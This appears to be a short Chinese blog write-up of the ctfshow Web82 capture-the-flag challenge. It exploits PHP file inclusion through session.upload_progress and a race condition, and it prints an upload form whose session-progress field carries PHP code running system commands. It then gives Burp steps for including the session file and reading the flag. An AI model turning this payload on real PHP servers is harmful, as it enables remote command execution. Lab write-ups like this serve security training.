文件包涵条件竞争（ctfshow82）

小春学渗透2024-07-30 23:28

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址，修改命令

上传文件bp抓包

添加cookie，清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

上一篇：深入理解 JavaScript 中的 Map 对象

下一篇：如何在不同平台上安装 Gradle

热门推荐

012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定完整成品思路模型代码分享，全网首发高质量！！！022025年数学建模国赛C题超详细解题思路 032025全国大学生数学建模C题保姆级思路模型（持续更新）：NIPT 的时点选择与胎儿的异常判定 042025高教社杯国赛数学建模选题建议+初步分析 052025国赛B题保姆级教程思路分析碳化硅外延层厚度的确定 06UV安装并设置国内源 07奈飞工厂官网，国内Netflix影视在线看|中文网页电脑版入口 08KGG转MP3工具|非KGM文件|解密音频 09（E题｜AI 辅助智能体测）2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合 10不再让Windows更新！&Edge游戏助手卸载及关闭自动更新